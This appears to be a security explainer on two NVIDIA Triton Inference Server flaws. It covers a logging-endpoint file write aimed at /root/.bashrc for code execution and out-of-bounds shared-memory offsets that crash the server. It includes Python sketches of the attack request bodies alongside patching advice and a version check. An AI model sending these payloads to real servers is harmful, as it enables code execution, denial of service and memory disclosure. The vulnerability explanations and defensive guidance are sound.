Two critical vulnerabilities have been identified in NVIDIA's Triton Inference Server, a platform widely used for serving AI inference. The first, CVE-2024-0087, lies in the server's log configuration interface: the log_file parameter of the /v2/logging endpoint can be abused to write arbitrary files. By pointing it at a sensitive file such as /root/.bashrc, an attacker can inject shell commands that execute when the file is later sourced by a shell, turning the file write into remote code execution.
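As a minimal illustration, the request body for such an attack might look like the sketch below. The endpoint path and the log_file parameter come from the vulnerability description above; the companion log_verbose_level field and the exact JSON schema are assumptions for illustration, not a verified exploit.

```python
import json

# Hypothetical sketch of a CVE-2024-0087-style request body: the attacker
# redirects server logging to a sensitive path so that log output (which can
# include attacker-controlled strings) is written into that file.
TARGET = "/root/.bashrc"  # file the attacker wants the server to write into

payload = {
    "log_file": TARGET,      # parameter named in the vulnerability description
    "log_verbose_level": 1,  # assumed companion setting; illustrative only
}

# The attacker would send this as: POST /v2/logging
body = json.dumps(payload)
print(body)
```

Because the injected content lands in a file that a shell later sources, the actual code execution happens outside the server process, on the next interactive login.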
The second vulnerability, CVE-2024-0088, stems from inadequate validation of the shared-memory parameters in inference requests. Because values such as shared_memory_offset and shared_memory_byte_size are not bounds-checked against the registered region, an attacker can drive memory accesses to attacker-controlled addresses, causing segmentation faults and potentially leaking sensitive memory contents, which undermines both the server's stability and its confidentiality.
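A rough sketch of the two-step request sequence follows. The shared_memory_offset and shared_memory_byte_size names are taken from the vulnerability description; the registration fields, region key, and model input are hypothetical placeholders, and the surrounding request schema is illustrative rather than an exact reproduction of Triton's API.

```python
import json

# Hypothetical sketch of a CVE-2024-0088-style attack: first register a small
# shared memory region, then reference it in an inference request with an
# offset that falls far outside the registered bounds.
register = {
    "key": "poc_region",  # assumed shared-memory key
    "offset": 0,
    "byte_size": 4096,    # region is only 4 KiB
}

infer = {
    "inputs": [{
        "name": "INPUT0",      # hypothetical model input
        "datatype": "FP32",
        "shape": [1, 4],
        "parameters": {
            "shared_memory_region": "poc_region",
            "shared_memory_offset": 0xFFFFFFFF,  # far outside the 4 KiB region
            "shared_memory_byte_size": 16,
        },
    }],
}

print(json.dumps(register))
print(json.dumps(infer))
```

Without a bounds check, the server computes a pointer from the registered base address plus the oversized offset and dereferences memory it never mapped for that region.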
Proofs of concept exist for both issues. For CVE-2024-0087, a single crafted POST request is enough to write attacker-controlled commands into a critical file, demonstrating the path to remote code execution. For CVE-2024-0088, registering a shared memory region and then referencing it with out-of-bounds parameters crashes the server with a segmentation fault, demonstrating both the denial-of-service impact and the risk of memory disclosure.
The discovery of these vulnerabilities underscores the urgent need for stronger security practices around AI infrastructure. Organizations running Triton Inference Server should apply NVIDIA's patches promptly and harden the surrounding deployment, for example by keeping management endpoints such as /v2/logging off untrusted networks. The flaws illustrate the ongoing challenges of AI security and the necessity of continuous vigilance.
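As a small operational aid, a deployment could verify the server's reported release before assuming it is patched. The sketch below assumes the server exposes a KServe-style metadata endpoint (GET /v2) whose JSON response includes a "version" field; the fixed-version string is an assumption here, so consult NVIDIA's security advisory for the authoritative patched release.

```python
import json

def is_patched(metadata_json: str, fixed: str = "24.05") -> bool:
    """Return True if the reported Triton release is at least `fixed`.

    `metadata_json` is the body of GET /v2 (assumed schema); `fixed` is a
    placeholder for the first patched release per NVIDIA's advisory.
    """
    version = json.loads(metadata_json).get("version", "0")

    def key(v: str):
        # Compare release strings like "23.10" numerically, part by part.
        return [int(p) for p in v.split(".") if p.isdigit()]

    return key(version) >= key(fixed)

# Example with a canned response instead of a live request:
print(is_patched('{"name": "triton", "version": "23.10"}'))  # → False
```

In practice the JSON would come from an HTTP GET against the running server rather than a canned string.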